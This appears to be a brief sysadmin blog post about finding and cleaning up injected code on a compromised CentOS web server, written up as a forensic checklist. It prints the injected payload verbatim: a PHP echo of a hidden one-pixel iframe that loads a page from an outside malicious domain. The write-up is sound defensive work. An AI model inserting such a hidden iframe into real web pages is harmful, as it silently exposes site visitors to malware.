A friend of mine had a problem with a server in which a particular PHP script kept changing, including an iframe when it shouldn't.
I took the following steps to see what was happening. This can be used as a checklist.
# cat /etc/redhat-release CentOS release 4.6
I found nothing weird in Apache's log files, no funny scripts et cetera.
In a bunch of PHP scripts, the following code was appended at the end:
echo '<iframe src="http://apartment-mall.cn/ind.php" width="1" height="1" alt="YTREWQhej2Htyu" style="visibility:hidden;position:absolute"></iframe>';
Googling for this turned out it's a pretty common attack. Articles suggest it might be a compomised FTP account. Checking the changed files, the date of the files suggests it's done in one fell swoop.
To see what FTP servers are running:
# ps -ef
In case I missed anything, see what ports are listened to:
# netstat --listen --ip -T -p
The -T option won't cut off long addresses and the -p option will print the process that's doing the listening.
Found out in /var/log/messages that a script logged in around the same time that the files were modified.
The conclusion was that a full OS reinstall was done, with a thorough tightening-up and a code review.